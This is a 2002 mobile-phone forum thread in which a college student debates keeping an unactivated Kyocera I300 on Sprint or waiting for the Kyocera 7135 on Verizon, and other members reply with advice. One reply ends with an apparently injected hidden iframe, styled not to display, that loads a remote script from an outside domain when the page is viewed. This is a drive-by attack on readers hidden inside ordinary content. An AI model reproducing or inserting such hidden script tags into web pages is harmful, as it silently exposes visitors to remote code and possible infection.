Poll: What would you do?

+ Reply to Thread

Thread: I300 Scenario

I300 Scenario

What would you do...?

You live in New York City, but you attend college in Philadelphia 8 months out of the year. You're a technogeek and have been wanting a smartphone since the glory-days of the QCP-6035. Right now, you own a Motorola StarTAC that you just aren't satisfied with, and your 2-year contract with Verizon is expiring next week. You've been fairly satisfied with Verizon over the last two years, but would be willing (within a reasonable measure) to switch to a different service if your "dream phone" required it. To make things more complicated, you just bought a brand-spanking new I300 this past weekend for $180 (after Sprint rebate and other mail in rebates). However, you haven't yet activated the phone, so you are not yet bound by the clamy hands of SprintPCS. The other day, the Kyocera 7135 was officially announced; your "dream phone" that you've been anxiously been awaiting since the first rumours and photos surfaced on the net. What would you do in this scenario particularly citing that:

- You have 30 days to return the I300
    - You would have to activate your I300 on Sprint by June 30th to secure the $70 MIR
    - You get MINIMAL signal from Sprint within a 1/2 block radius of your house (usually Analog Roam) because you live in a valley (but it IS a mobile phone after all, and home-use would probably be limited anyway), whereas Verizon provides full service there.
    - Ideally you would like to have the 7035 on Verizon by early Fall 2002
    - You don't want to live another six months without a smartphone
    - Reports fail to agree on 7135's release date... some say late summer / early fall... some say winter

What would you do?
    Last edited by tgpaul; 06-25-2002 at 11:54 PM.
    PhD., Technobabble

comon tg........ you've been muckin round this site for weeks drooling ova the I300. Keep the thing, activate it, & move on......lol..... all providers suck in one way or another, just activate it & enjoy....................... P
    .....beam me up Scotty...

I-300 Novice
    TG..

Why don't you just activate the I-300 on a month-to-month plan (which will cost you the rebate plus $10/month), enjoy the I-300 and when the 7135 does come out, if you like it buy it?

Then just write off the extra you spent on the I-300 while you enjoyed it and give up a few nights out or dinners at Le Bec Fin and call it a wash?

The joy you are going to get out of the I-300 while you are waiting for the next super smartphone will more than outweigh the pleasure you may get out of an evening out with that special someone...
    Ahmed V. Ismail
    A Smartphone Addict

Originally posted by PHCismail
    give up a few nights out or dinners at Le Bec Fin
    LOL... I'm a college student... Needless to say, I can't even afford a single dinner at Le Bec Fin.

Anyway, I think I've decided what I'm going to do. I left out one option that I totally forgot I had:

So even before the first modern smartphone was invented (pre-6035) I connected my StarTac to my Palm V via a custom cable. It did the trick perfectly, other than that the package was quite bulky, and I needed to carry two seperate devices all the time. Then my Palm screen cracked. I just learned to live without a Palm because I wasn't going to spend 100 bucks to fix it when I could just buy a smartphone (the 6035 was out by then, but not yet the I300). A few months ago, I figured I should repair it anyway, since it would "add value" when selling the Palm V, and I could still use it in the mean time. But being the miser I am, I bought just the screen for $50 thinking I could replace it myself. Big mistake. Well the screen installation went flawlessly, other than that I think I fried the motherboard in the process (No screws hold the case together, so you have to use a hairdryer to melt the glue that keeps the shell together). So, maybe I should just spend the 50-100 bucks to get it fixed, get the use out of it until November, sell it, and get myself a 7135 then. What do you think?

TGP
    PhD., Technobabble

Administrator

Arrow

obviously you think verizon is the best thing out there so stay with them and hope for the best!

Originally posted by Marctronixx
    obviously you think verizon is the best thing out there so stay with them and hope for the best!
    Well, Verizon has it's faults... but seeing as:

a) I live in New York and Philadelphia primarily where Verizon has FULL coverage
    b) I get no Sprint signal in my house

I'd say Verizon is the better choice. But I'm still torn. So many choices...
    PhD., Technobabble

Administrator

Arrow

Originally posted by tgpaul

Well, Verizon has it's faults... but seeing as:

a) I live in New York and Philadelphia primarily where Verizon has FULL coverage
    b) I get no Sprint signal in my house

I'd say Verizon is the better choice. But I'm still torn. So many choices...
    seems you made up your own mind... stick with them... they will be releaseing the 7135 as their flagship smartphone so hang out a little longer...<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Originally posted by Marctronixx

seems you made up your own mind... stick with them... they will be releaseing the 7135 as their flagship smartphone so hang out a little longer...
    Guilty as charged. I guess I was looking for a REALLY, REALLY good reason to stick with Sprint/I300, like they buy you hookers with a 5-year service agreement. Thank you all for your replies.

TGP
    PhD., Technobabble